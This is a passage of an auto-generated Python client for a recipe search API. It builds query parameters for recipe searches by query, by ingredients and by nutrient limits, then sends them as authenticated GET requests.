:param float max_vitamin_b2: The maximum amount of Vitamin B2 in milligrams the recipe can have.
:param float min_vitamin_b5: The minimum amount of Vitamin B5 in milligrams the recipe must have.
:param float max_vitamin_b5: The maximum amount of Vitamin B5 in milligrams the recipe can have.
:param float min_vitamin_b3: The minimum amount of Vitamin B3 in milligrams the recipe must have.
:param float max_vitamin_b3: The maximum amount of Vitamin B3 in milligrams the recipe can have.
:param float min_vitamin_b6: The minimum amount of Vitamin B6 in milligrams the recipe must have.
:param float max_vitamin_b6: The maximum amount of Vitamin B6 in milligrams the recipe can have.
:param float min_vitamin_b12: The minimum amount of Vitamin B12 in micrograms the recipe must have.
:param float max_vitamin_b12: The maximum amount of Vitamin B12 in micrograms the recipe can have.
:param float min_fiber: The minimum amount of fiber in grams the recipe must have.
:param float max_fiber: The maximum amount of fiber in grams the recipe can have.
:param float min_folate: The minimum amount of folate in micrograms the recipe must have.
:param float max_folate: The maximum amount of folate in micrograms the recipe can have.
:param float min_folic_acid: The minimum amount of folic acid in micrograms the recipe must have.
:param float max_folic_acid: The maximum amount of folic acid in micrograms the recipe can have.
:param float min_iodine: The minimum amount of iodine in micrograms the recipe must have.
:param float max_iodine: The maximum amount of iodine in micrograms the recipe can have.
:param float min_iron: The minimum amount of iron in milligrams the recipe must have.
:param float max_iron: The maximum amount of iron in milligrams the recipe can have.
:param float min_magnesium: The minimum amount of magnesium in milligrams the recipe must have.
:param float max_magnesium: The maximum amount of magnesium in milligrams the recipe can have.
:param float min_manganese: The minimum amount of manganese in milligrams the recipe must have.
:param float max_manganese: The maximum amount of manganese in milligrams the recipe can have.
:param float min_phosphorus: The minimum amount of phosphorus in milligrams the recipe must have.
:param float max_phosphorus: The maximum amount of phosphorus in milligrams the recipe can have.
:param float min_potassium: The minimum amount of potassium in milligrams the recipe must have.
:param float max_potassium: The maximum amount of potassium in milligrams the recipe can have.
:param float min_selenium: The minimum amount of selenium in micrograms the recipe must have.
:param float max_selenium: The maximum amount of selenium in micrograms the recipe can have.
:param float min_sodium: The minimum amount of sodium in milligrams the recipe must have.
:param float max_sodium: The maximum amount of sodium in milligrams the recipe can have.
:param float min_sugar: The minimum amount of sugar in grams the recipe must have.
:param float max_sugar: The maximum amount of sugar in grams the recipe can have.
:param float min_zinc: The minimum amount of zinc in milligrams the recipe must have.
:param float max_zinc: The maximum amount of zinc in milligrams the recipe can have.
:param float offset: The number of results to skip (between 0 and 900).
:param float number: The number of expected results (between 1 and 100).
:param bool limit_license: Whether the recipes should have an open license that allows display with proper attribution.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.search_recipes_with_http_info(query, **kwargs) # noqa: E501
else:
(data) = self.search_recipes_with_http_info(query, **kwargs) # noqa: E501
return data
def search_recipes_with_http_info(self, query, **kwargs): # noqa: E501
"""Search Recipes # noqa: E501
Search through hundreds of thousands of recipes using advanced filtering and ranking. NOTE: This method combines searching by query, by ingredients, and by nutrients into one endpoint. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_recipes_with_http_info(query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: The (natural language) recipe search query. (required)
:param str cuisine: The cuisine(s) of the recipes. One or more, comma separated (will be interpreted as 'OR'). See a full list of supported cuisines.
:param str exclude_cuisine: The cuisine(s) the recipes must not match. One or more, comma separated (will be interpreted as 'AND'). See a full list of supported cuisines.
:param str diet: The diet for which the recipes must be suitable. See a full list of supported diets.
:param str intolerances: A comma-separated list of intolerances. All recipes returned must not contain ingredients that are not suitable for people with the intolerances entered. See a full list of supported intolerances.
:param str equipment: The equipment required. Multiple values will be interpreted as 'or'. For example, value could be \"blender, frying pan, bowl\".
:param str include_ingredients: A comma-separated list of ingredients that should/must be used in the recipes.
:param str exclude_ingredients: A comma-separated list of ingredients or ingredient types that the recipes must not contain.
:param str type: The type of recipe. See a full list of supported meal types.
:param bool instructions_required: Whether the recipes must have instructions.
:param bool fill_ingredients: Add information about the ingredients and whether they are used or missing in relation to the query.
:param bool add_recipe_information: If set to true, you get more information about the recipes returned.
:param bool add_recipe_nutrition: If set to true, you get nutritional information about each recipes returned.
:param str author: The username of the recipe author.
:param str tags: User defined tags that have to match. The author param has to be set.
:param float recipe_box_id: The id of the recipe box to which the search should be limited to.
:param str title_match: Enter text that must be found in the title of the recipes.
:param float max_ready_time: The maximum time in minutes it should take to prepare and cook the recipe.
:param bool ignore_pantry: Whether to ignore typical pantry items, such as water, salt, flour, etc.
:param str sort: The strategy to sort recipes by. See a full list of supported sorting options.
:param str sort_direction: The direction in which to sort. Must be either 'asc' (ascending) or 'desc' (descending).
:param float min_carbs: The minimum amount of carbohydrates in grams the recipe must have.
:param float max_carbs: The maximum amount of carbohydrates in grams the recipe can have.
:param float min_protein: The minimum amount of protein in grams the recipe must have.
:param float max_protein: The maximum amount of protein in grams the recipe can have.
:param float min_calories: The minimum amount of calories the recipe must have.
:param float max_calories: The maximum amount of calories the recipe can have.
:param float min_fat: The minimum amount of fat in grams the recipe must have.
:param float max_fat: The maximum amount of fat in grams the recipe can have.
:param float min_alcohol: The minimum amount of alcohol in grams the recipe must have.
:param float max_alcohol: The maximum amount of alcohol in grams the recipe can have.
:param float min_caffeine: The minimum amount of caffeine in milligrams the recipe must have.
:param float max_caffeine: The maximum amount of caffeine in milligrams the recipe can have.
:param float min_copper: The minimum amount of copper in milligrams the recipe must have.
:param float max_copper: The maximum amount of copper in milligrams the recipe can have.
:param float min_calcium: The minimum amount of calcium in milligrams the recipe must have.
:param float max_calcium: The maximum amount of calcium in milligrams the recipe can have.
:param float min_choline: The minimum amount of choline in milligrams the recipe must have.
:param float max_choline: The maximum amount of choline in milligrams the recipe can have.
:param float min_cholesterol: The minimum amount of cholesterol in milligrams the recipe must have.
:param float max_cholesterol: The maximum amount of cholesterol in milligrams the recipe can have.
:param float min_fluoride: The minimum amount of fluoride in milligrams the recipe must have.
:param float max_fluoride: The maximum amount of fluoride in milligrams the recipe can have.
:param float min_saturated_fat: The minimum amount of saturated fat in grams the recipe must have.
:param float max_saturated_fat: The maximum amount of saturated fat in grams the recipe can have.
:param float min_vitamin_a: The minimum amount of Vitamin A in IU the recipe must have.
:param float max_vitamin_a: The maximum amount of Vitamin A in IU the recipe can have.
:param float min_vitamin_c: The minimum amount of Vitamin C milligrams the recipe must have.
:param float max_vitamin_c: The maximum amount of Vitamin C in milligrams the recipe can have.
:param float min_vitamin_d: The minimum amount of Vitamin D in micrograms the recipe must have.
:param float max_vitamin_d: The maximum amount of Vitamin D in micrograms the recipe can have.
:param float min_vitamin_e: The minimum amount of Vitamin E in milligrams the recipe must have.
:param float max_vitamin_e: The maximum amount of Vitamin E in milligrams the recipe can have.
:param float min_vitamin_k: The minimum amount of Vitamin K in micrograms the recipe must have.
:param float max_vitamin_k: The maximum amount of Vitamin K in micrograms the recipe can have.
:param float min_vitamin_b1: The minimum amount of Vitamin B1 in milligrams the recipe must have.
:param float max_vitamin_b1: The maximum amount of Vitamin B1 in milligrams the recipe can have.
:param float min_vitamin_b2: The minimum amount of Vitamin B2 in milligrams the recipe must have.
:param float max_vitamin_b2: The maximum amount of Vitamin B2 in milligrams the recipe can have.
:param float min_vitamin_b5: The minimum amount of Vitamin B5 in milligrams the recipe must have.
:param float max_vitamin_b5: The maximum amount of Vitamin B5 in milligrams the recipe can have.
:param float min_vitamin_b3: The minimum amount of Vitamin B3 in milligrams the recipe must have.
:param float max_vitamin_b3: The maximum amount of Vitamin B3 in milligrams the recipe can have.
:param float min_vitamin_b6: The minimum amount of Vitamin B6 in milligrams the recipe must have.
:param float max_vitamin_b6: The maximum amount of Vitamin B6 in milligrams the recipe can have.
:param float min_vitamin_b12: The minimum amount of Vitamin B12 in micrograms the recipe must have.
:param float max_vitamin_b12: The maximum amount of Vitamin B12 in micrograms the recipe can have.
:param float min_fiber: The minimum amount of fiber in grams the recipe must have.
:param float max_fiber: The maximum amount of fiber in grams the recipe can have.
:param float min_folate: The minimum amount of folate in micrograms the recipe must have.
:param float max_folate: The maximum amount of folate in micrograms the recipe can have.
:param float min_folic_acid: The minimum amount of folic acid in micrograms the recipe must have.
:param float max_folic_acid: The maximum amount of folic acid in micrograms the recipe can have.
:param float min_iodine: The minimum amount of iodine in micrograms the recipe must have.
:param float max_iodine: The maximum amount of iodine in micrograms the recipe can have.
:param float min_iron: The minimum amount of iron in milligrams the recipe must have.
:param float max_iron: The maximum amount of iron in milligrams the recipe can have.
:param float min_magnesium: The minimum amount of magnesium in milligrams the recipe must have.
:param float max_magnesium: The maximum amount of magnesium in milligrams the recipe can have.
:param float min_manganese: The minimum amount of manganese in milligrams the recipe must have.
:param float max_manganese: The maximum amount of manganese in milligrams the recipe can have.
:param float min_phosphorus: The minimum amount of phosphorus in milligrams the recipe must have.
:param float max_phosphorus: The maximum amount of phosphorus in milligrams the recipe can have.
:param float min_potassium: The minimum amount of potassium in milligrams the recipe must have.
:param float max_potassium: The maximum amount of potassium in milligrams the recipe can have.
:param float min_selenium: The minimum amount of selenium in micrograms the recipe must have.
:param float max_selenium: The maximum amount of selenium in micrograms the recipe can have.
:param float min_sodium: The minimum amount of sodium in milligrams the recipe must have.
:param float max_sodium: The maximum amount of sodium in milligrams the recipe can have.
:param float min_sugar: The minimum amount of sugar in grams the recipe must have.
:param float max_sugar: The maximum amount of sugar in grams the recipe can have.
:param float min_zinc: The minimum amount of zinc in milligrams the recipe must have.
:param float max_zinc: The maximum amount of zinc in milligrams the recipe can have.
:param float offset: The number of results to skip (between 0 and 900).
:param float number: The number of expected results (between 1 and 100).
:param bool limit_license: Whether the recipes should have an open license that allows display with proper attribution.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['query', 'cuisine', 'exclude_cuisine', 'diet', 'intolerances', 'equipment', 'include_ingredients', 'exclude_ingredients', 'type', 'instructions_required', 'fill_ingredients', 'add_recipe_information', 'add_recipe_nutrition', 'author', 'tags', 'recipe_box_id', 'title_match', 'max_ready_time', 'ignore_pantry', 'sort', 'sort_direction', 'min_carbs', 'max_carbs', 'min_protein', 'max_protein', 'min_calories', 'max_calories', 'min_fat', 'max_fat', 'min_alcohol', 'max_alcohol', 'min_caffeine', 'max_caffeine', 'min_copper', 'max_copper', 'min_calcium', 'max_calcium', 'min_choline', 'max_choline', 'min_cholesterol', 'max_cholesterol', 'min_fluoride', 'max_fluoride', 'min_saturated_fat', 'max_saturated_fat', 'min_vitamin_a', 'max_vitamin_a', 'min_vitamin_c', 'max_vitamin_c', 'min_vitamin_d', 'max_vitamin_d', 'min_vitamin_e', 'max_vitamin_e', 'min_vitamin_k', 'max_vitamin_k', 'min_vitamin_b1', 'max_vitamin_b1', 'min_vitamin_b2', 'max_vitamin_b2', 'min_vitamin_b5', 'max_vitamin_b5', 'min_vitamin_b3', 'max_vitamin_b3', 'min_vitamin_b6', 'max_vitamin_b6', 'min_vitamin_b12', 'max_vitamin_b12', 'min_fiber', 'max_fiber', 'min_folate', 'max_folate', 'min_folic_acid', 'max_folic_acid', 'min_iodine', 'max_iodine', 'min_iron', 'max_iron', 'min_magnesium', 'max_magnesium', 'min_manganese', 'max_manganese', 'min_phosphorus', 'max_phosphorus', 'min_potassium', 'max_potassium', 'min_selenium', 'max_selenium', 'min_sodium', 'max_sodium', 'min_sugar', 'max_sugar', 'min_zinc', 'max_zinc', 'offset', 'number', 'limit_license'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method search_recipes" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'query' is set
if ('query' not in local_var_params or
local_var_params['query'] is None):
raise ApiValueError("Missing the required parameter `query` when calling `search_recipes`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'query' in local_var_params:
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'cuisine' in local_var_params:
query_params.append(('cuisine', local_var_params['cuisine'])) # noqa: E501
if 'exclude_cuisine' in local_var_params:
query_params.append(('excludeCuisine', local_var_params['exclude_cuisine'])) # noqa: E501
if 'diet' in local_var_params:
query_params.append(('diet', local_var_params['diet'])) # noqa: E501
if 'intolerances' in local_var_params:
query_params.append(('intolerances', local_var_params['intolerances'])) # noqa: E501
if 'equipment' in local_var_params:
query_params.append(('equipment', local_var_params['equipment'])) # noqa: E501
if 'include_ingredients' in local_var_params:
query_params.append(('includeIngredients', local_var_params['include_ingredients'])) # noqa: E501
if 'exclude_ingredients' in local_var_params:
query_params.append(('excludeIngredients', local_var_params['exclude_ingredients'])) # noqa: E501
if 'type' in local_var_params:
query_params.append(('type', local_var_params['type'])) # noqa: E501
if 'instructions_required' in local_var_params:
query_params.append(('instructionsRequired', local_var_params['instructions_required'])) # noqa: E501
if 'fill_ingredients' in local_var_params:
query_params.append(('fillIngredients', local_var_params['fill_ingredients'])) # noqa: E501
if 'add_recipe_information' in local_var_params:
query_params.append(('addRecipeInformation', local_var_params['add_recipe_information'])) # noqa: E501
if 'add_recipe_nutrition' in local_var_params:
query_params.append(('addRecipeNutrition', local_var_params['add_recipe_nutrition'])) # noqa: E501
if 'author' in local_var_params:
query_params.append(('author', local_var_params['author'])) # noqa: E501
if 'tags' in local_var_params:
query_params.append(('tags', local_var_params['tags'])) # noqa: E501
if 'recipe_box_id' in local_var_params:
query_params.append(('recipeBoxId', local_var_params['recipe_box_id'])) # noqa: E501
if 'title_match' in local_var_params:
query_params.append(('titleMatch', local_var_params['title_match'])) # noqa: E501
if 'max_ready_time' in local_var_params:
query_params.append(('maxReadyTime', local_var_params['max_ready_time'])) # noqa: E501
if 'ignore_pantry' in local_var_params:
query_params.append(('ignorePantry', local_var_params['ignore_pantry'])) # noqa: E501
if 'sort' in local_var_params:
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'sort_direction' in local_var_params:
query_params.append(('sortDirection', local_var_params['sort_direction'])) # noqa: E501
if 'min_carbs' in local_var_params:
query_params.append(('minCarbs', local_var_params['min_carbs'])) # noqa: E501
if 'max_carbs' in local_var_params:
query_params.append(('maxCarbs', local_var_params['max_carbs'])) # noqa: E501
if 'min_protein' in local_var_params:
query_params.append(('minProtein', local_var_params['min_protein'])) # noqa: E501
if 'max_protein' in local_var_params:
query_params.append(('maxProtein', local_var_params['max_protein'])) # noqa: E501
if 'min_calories' in local_var_params:
query_params.append(('minCalories', local_var_params['min_calories'])) # noqa: E501
if 'max_calories' in local_var_params:
query_params.append(('maxCalories', local_var_params['max_calories'])) # noqa: E501
if 'min_fat' in local_var_params:
query_params.append(('minFat', local_var_params['min_fat'])) # noqa: E501
if 'max_fat' in local_var_params:
query_params.append(('maxFat', local_var_params['max_fat'])) # noqa: E501
if 'min_alcohol' in local_var_params:
query_params.append(('minAlcohol', local_var_params['min_alcohol'])) # noqa: E501
if 'max_alcohol' in local_var_params:
query_params.append(('maxAlcohol', local_var_params['max_alcohol'])) # noqa: E501
if 'min_caffeine' in local_var_params:
query_params.append(('minCaffeine', local_var_params['min_caffeine'])) # noqa: E501
if 'max_caffeine' in local_var_params:
query_params.append(('maxCaffeine', local_var_params['max_caffeine'])) # noqa: E501
if 'min_copper' in local_var_params:
query_params.append(('minCopper', local_var_params['min_copper'])) # noqa: E501
if 'max_copper' in local_var_params:
query_params.append(('maxCopper', local_var_params['max_copper'])) # noqa: E501
if 'min_calcium' in local_var_params:
query_params.append(('minCalcium', local_var_params['min_calcium'])) # noqa: E501
if 'max_calcium' in local_var_params:
query_params.append(('maxCalcium', local_var_params['max_calcium'])) # noqa: E501
if 'min_choline' in local_var_params:
query_params.append(('minCholine', local_var_params['min_choline'])) # noqa: E501
if 'max_choline' in local_var_params:
query_params.append(('maxCholine', local_var_params['max_choline'])) # noqa: E501
if 'min_cholesterol' in local_var_params:
query_params.append(('minCholesterol', local_var_params['min_cholesterol'])) # noqa: E501
if 'max_cholesterol' in local_var_params:
query_params.append(('maxCholesterol', local_var_params['max_cholesterol'])) # noqa: E501
if 'min_fluoride' in local_var_params:
query_params.append(('minFluoride', local_var_params['min_fluoride'])) # noqa: E501
if 'max_fluoride' in local_var_params:
query_params.append(('maxFluoride', local_var_params['max_fluoride'])) # noqa: E501
if 'min_saturated_fat' in local_var_params:
query_params.append(('minSaturatedFat', local_var_params['min_saturated_fat'])) # noqa: E501
if 'max_saturated_fat' in local_var_params:
query_params.append(('maxSaturatedFat', local_var_params['max_saturated_fat'])) # noqa: E501
if 'min_vitamin_a' in local_var_params:
query_params.append(('minVitaminA', local_var_params['min_vitamin_a'])) # noqa: E501
if 'max_vitamin_a' in local_var_params:
query_params.append(('maxVitaminA', local_var_params['max_vitamin_a'])) # noqa: E501
if 'min_vitamin_c' in local_var_params:
query_params.append(('minVitaminC', local_var_params['min_vitamin_c'])) # noqa: E501
if 'max_vitamin_c' in local_var_params:
query_params.append(('maxVitaminC', local_var_params['max_vitamin_c'])) # noqa: E501
if 'min_vitamin_d' in local_var_params:
query_params.append(('minVitaminD', local_var_params['min_vitamin_d'])) # noqa: E501
if 'max_vitamin_d' in local_var_params:
query_params.append(('maxVitaminD', local_var_params['max_vitamin_d'])) # noqa: E501
if 'min_vitamin_e' in local_var_params:
query_params.append(('minVitaminE', local_var_params['min_vitamin_e'])) # noqa: E501
if 'max_vitamin_e' in local_var_params:
query_params.append(('maxVitaminE', local_var_params['max_vitamin_e'])) # noqa: E501
if 'min_vitamin_k' in local_var_params:
query_params.append(('minVitaminK', local_var_params['min_vitamin_k'])) # noqa: E501
if 'max_vitamin_k' in local_var_params:
query_params.append(('maxVitaminK', local_var_params['max_vitamin_k'])) # noqa: E501
if 'min_vitamin_b1' in local_var_params:
query_params.append(('minVitaminB1', local_var_params['min_vitamin_b1'])) # noqa: E501
if 'max_vitamin_b1' in local_var_params:
query_params.append(('maxVitaminB1', local_var_params['max_vitamin_b1'])) # noqa: E501
if 'min_vitamin_b2' in local_var_params:
query_params.append(('minVitaminB2', local_var_params['min_vitamin_b2'])) # noqa: E501
if 'max_vitamin_b2' in local_var_params:
query_params.append(('maxVitaminB2', local_var_params['max_vitamin_b2'])) # noqa: E501
if 'min_vitamin_b5' in local_var_params:
query_params.append(('minVitaminB5', local_var_params['min_vitamin_b5'])) # noqa: E501
if 'max_vitamin_b5' in local_var_params:
query_params.append(('maxVitaminB5', local_var_params['max_vitamin_b5'])) # noqa: E501
if 'min_vitamin_b3' in local_var_params:
query_params.append(('minVitaminB3', local_var_params['min_vitamin_b3'])) # noqa: E501
if 'max_vitamin_b3' in local_var_params:
query_params.append(('maxVitaminB3', local_var_params['max_vitamin_b3'])) # noqa: E501
if 'min_vitamin_b6' in local_var_params:
query_params.append(('minVitaminB6', local_var_params['min_vitamin_b6'])) # noqa: E501
if 'max_vitamin_b6' in local_var_params:
query_params.append(('maxVitaminB6', local_var_params['max_vitamin_b6'])) # noqa: E501
if 'min_vitamin_b12' in local_var_params:
query_params.append(('minVitaminB12', local_var_params['min_vitamin_b12'])) # noqa: E501
if 'max_vitamin_b12' in local_var_params:
query_params.append(('maxVitaminB12', local_var_params['max_vitamin_b12'])) # noqa: E501
if 'min_fiber' in local_var_params:
query_params.append(('minFiber', local_var_params['min_fiber'])) # noqa: E501
if 'max_fiber' in local_var_params:
query_params.append(('maxFiber', local_var_params['max_fiber'])) # noqa: E501
if 'min_folate' in local_var_params:
query_params.append(('minFolate', local_var_params['min_folate'])) # noqa: E501
if 'max_folate' in local_var_params:
query_params.append(('maxFolate', local_var_params['max_folate'])) # noqa: E501
if 'min_folic_acid' in local_var_params:
query_params.append(('minFolicAcid', local_var_params['min_folic_acid'])) # noqa: E501
if 'max_folic_acid' in local_var_params:
query_params.append(('maxFolicAcid', local_var_params['max_folic_acid'])) # noqa: E501
if 'min_iodine' in local_var_params:
query_params.append(('minIodine', local_var_params['min_iodine'])) # noqa: E501
if 'max_iodine' in local_var_params:
query_params.append(('maxIodine', local_var_params['max_iodine'])) # noqa: E501
if 'min_iron' in local_var_params:
query_params.append(('minIron', local_var_params['min_iron'])) # noqa: E501
if 'max_iron' in local_var_params:
query_params.append(('maxIron', local_var_params['max_iron'])) # noqa: E501
if 'min_magnesium' in local_var_params:
query_params.append(('minMagnesium', local_var_params['min_magnesium'])) # noqa: E501
if 'max_magnesium' in local_var_params:
query_params.append(('maxMagnesium', local_var_params['max_magnesium'])) # noqa: E501
if 'min_manganese' in local_var_params:
query_params.append(('minManganese', local_var_params['min_manganese'])) # noqa: E501
if 'max_manganese' in local_var_params:
query_params.append(('maxManganese', local_var_params['max_manganese'])) # noqa: E501
if 'min_phosphorus' in local_var_params:
query_params.append(('minPhosphorus', local_var_params['min_phosphorus'])) # noqa: E501
if 'max_phosphorus' in local_var_params:
query_params.append(('maxPhosphorus', local_var_params['max_phosphorus'])) # noqa: E501
if 'min_potassium' in local_var_params:
query_params.append(('minPotassium', local_var_params['min_potassium'])) # noqa: E501
if 'max_potassium' in local_var_params:
query_params.append(('maxPotassium', local_var_params['max_potassium'])) # noqa: E501
if 'min_selenium' in local_var_params:
query_params.append(('minSelenium', local_var_params['min_selenium'])) # noqa: E501
if 'max_selenium' in local_var_params:
query_params.append(('maxSelenium', local_var_params['max_selenium'])) # noqa: E501
if 'min_sodium' in local_var_params:
query_params.append(('minSodium', local_var_params['min_sodium'])) # noqa: E501
if 'max_sodium' in local_var_params:
query_params.append(('maxSodium', local_var_params['max_sodium'])) # noqa: E501
if 'min_sugar' in local_var_params:
query_params.append(('minSugar', local_var_params['min_sugar'])) # noqa: E501
if 'max_sugar' in local_var_params:
query_params.append(('maxSugar', local_var_params['max_sugar'])) # noqa: E501
if 'min_zinc' in local_var_params:
query_params.append(('minZinc', local_var_params['min_zinc'])) # noqa: E501
if 'max_zinc' in local_var_params:
query_params.append(('maxZinc', local_var_params['max_zinc'])) # noqa: E501
if 'offset' in local_var_params:
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'number' in local_var_params:
query_params.append(('number', local_var_params['number'])) # noqa: E501
if 'limit_license' in local_var_params:
query_params.append(('limitLicense', local_var_params['limit_license'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/complexSearch', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def search_recipes_by_ingredients(self, ingredients, **kwargs): # noqa: E501
"""Search Recipes by Ingredients # noqa: E501
Ever wondered what recipes you can cook with the ingredients you have in your fridge or pantry? This endpoint lets you find recipes that either maximize the usage of ingredients you have at hand (pre shopping) or minimize the ingredients that you don't currently have (post shopping). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_recipes_by_ingredients(ingredients, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ingredients: A comma-separated list of ingredients that the recipes should contain. (required)
:param float number: The maximum number of recipes to return (between 1 and 100). Defaults to 10.
:param bool limit_license: Whether the recipes should have an open license that allows display with proper attribution.
:param float ranking: Whether to maximize used ingredients (1) or minimize missing ingredients (2) first.
:param bool ignore_pantry: Whether to ignore typical pantry items, such as water, salt, flour, etc.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.search_recipes_by_ingredients_with_http_info(ingredients, **kwargs) # noqa: E501
else:
(data) = self.search_recipes_by_ingredients_with_http_info(ingredients, **kwargs) # noqa: E501
return data
def search_recipes_by_ingredients_with_http_info(self, ingredients, **kwargs): # noqa: E501
"""Search Recipes by Ingredients # noqa: E501
Ever wondered what recipes you can cook with the ingredients you have in your fridge or pantry? This endpoint lets you find recipes that either maximize the usage of ingredients you have at hand (pre shopping) or minimize the ingredients that you don't currently have (post shopping). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_recipes_by_ingredients_with_http_info(ingredients, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ingredients: A comma-separated list of ingredients that the recipes should contain. (required)
:param float number: The maximum number of recipes to return (between 1 and 100). Defaults to 10.
:param bool limit_license: Whether the recipes should have an open license that allows display with proper attribution.
:param float ranking: Whether to maximize used ingredients (1) or minimize missing ingredients (2) first.
:param bool ignore_pantry: Whether to ignore typical pantry items, such as water, salt, flour, etc.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['ingredients', 'number', 'limit_license', 'ranking', 'ignore_pantry'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method search_recipes_by_ingredients" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'ingredients' is set
if ('ingredients' not in local_var_params or
local_var_params['ingredients'] is None):
raise ApiValueError("Missing the required parameter `ingredients` when calling `search_recipes_by_ingredients`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'ingredients' in local_var_params:
query_params.append(('ingredients', local_var_params['ingredients'])) # noqa: E501
if 'number' in local_var_params:
query_params.append(('number', local_var_params['number'])) # noqa: E501
if 'limit_license' in local_var_params:
query_params.append(('limitLicense', local_var_params['limit_license'])) # noqa: E501
if 'ranking' in local_var_params:
query_params.append(('ranking', local_var_params['ranking'])) # noqa: E501
if 'ignore_pantry' in local_var_params:
query_params.append(('ignorePantry', local_var_params['ignore_pantry'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/findByIngredients', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def search_recipes_by_nutrients(self, **kwargs): # noqa: E501
"""Search Recipes by Nutrients # noqa: E501
Find a set of recipes that adhere to the given nutritional limits. You may set limits for macronutrients (calories, protein, fat, and carbohydrate) and/or many micronutrients. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_recipes_by_nutrients(async_req=True)
>>> result = thread.get()
:param async_req bool
:param float min_carbs: The minimum amount of carbohydrates in grams the recipe must have.
:param float max_carbs: The maximum amount of carbohydrates in grams the recipe can have.
:param float min_protein: The minimum amount of protein in grams the recipe must have.
:param float max_protein: The maximum amount of protein in grams the recipe can have.
:param float min_calories: The minimum amount of calories the recipe must have.
:param float max_calories: The maximum amount of calories the recipe can have.
:param float min_fat: The minimum amount of fat in grams the recipe must have.
:param float max_fat: The maximum amount of fat in grams the recipe can have.
:param float min_alcohol: The minimum amount of alcohol in grams the recipe must have.
:param float max_alcohol: The maximum amount of alcohol in grams the recipe can have.
:param float min_caffeine: The minimum amount of caffeine in milligrams the recipe must have.
:param float max_caffeine: The maximum amount of caffeine in milligrams the recipe can have.
:param float min_copper: The minimum amount of copper in milligrams the recipe must have.
:param float max_copper: The maximum amount of copper in milligrams the recipe can have.
:param float min_calcium: The minimum amount of calcium in milligrams the recipe must have.
:param float max_calcium: The maximum amount of calcium in milligrams the recipe can have.
:param float min_choline: The minimum amount of choline in milligrams the recipe must have.
:param float max_choline: The maximum amount of choline in milligrams the recipe can have.
:param float min_cholesterol: The minimum amount of cholesterol in milligrams the recipe must have.
:param float max_cholesterol: The maximum amount of cholesterol in milligrams the recipe can have.
:param float min_fluoride: The minimum amount of fluoride in milligrams the recipe must have.
:param float max_fluoride: The maximum amount of fluoride in milligrams the recipe can have.
:param float min_saturated_fat: The minimum amount of saturated fat in grams the recipe must have.
:param float max_saturated_fat: The maximum amount of saturated fat in grams the recipe can have.
:param float min_vitamin_a: The minimum amount of Vitamin A in IU the recipe must have.
:param float max_vitamin_a: The maximum amount of Vitamin A in IU the recipe can have.
:param float min_vitamin_c: The minimum amount of Vitamin C in milligrams the recipe must have.
:param float max_vitamin_c: The maximum amount of Vitamin C in milligrams the recipe can have.
:param float min_vitamin_d: The minimum amount of Vitamin D in micrograms the recipe must have.
:param float max_vitamin_d: The maximum amount of Vitamin D in micrograms the recipe can have.
:param float min_vitamin_e: The minimum amount of Vitamin E in milligrams the recipe must have.
:param float max_vitamin_e: The maximum amount of Vitamin E in milligrams the recipe can have.
:param float min_vitamin_k: The minimum amount of Vitamin K in micrograms the recipe must have.
:param float max_vitamin_k: The maximum amount of Vitamin K in micrograms the recipe can have.
:param float min_vitamin_b1: The minimum amount of Vitamin B1 in milligrams the recipe must have.
:param float max_vitamin_b1: The maximum amount of Vitamin B1 in milligrams the recipe can have.
:param float min_vitamin_b2: The minimum amount of Vitamin B2 in milligrams the recipe must have.
